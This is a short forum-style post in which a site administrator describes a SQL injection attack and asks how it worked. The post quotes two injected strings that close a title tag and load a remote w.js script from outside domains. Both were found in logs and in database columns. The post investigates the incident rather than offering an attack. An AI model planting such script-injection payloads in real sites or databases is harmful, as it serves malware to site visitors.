SQL Injection attacked so many sites these days. After analyzing the attacking, I got a very strange case.
The attacking url including a script trying to add following string to varchar columns in database:
></title><script src="http://jjmaoduo2.3322.org/csrss/w.js"></script><!--
It was captured by log.
But in database, the data was changed by following string and only to those columns including some special keywords like url, publish, image, etc:
></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--
A little different with the malicious site name.So I guest maybe there was some other thing hidden with this attack. but can't figure it out.
Another question is: there is no file was changed on server site. How was this injection added to some url? where is the source of attacking? On the fly? From client computer?
Any idea?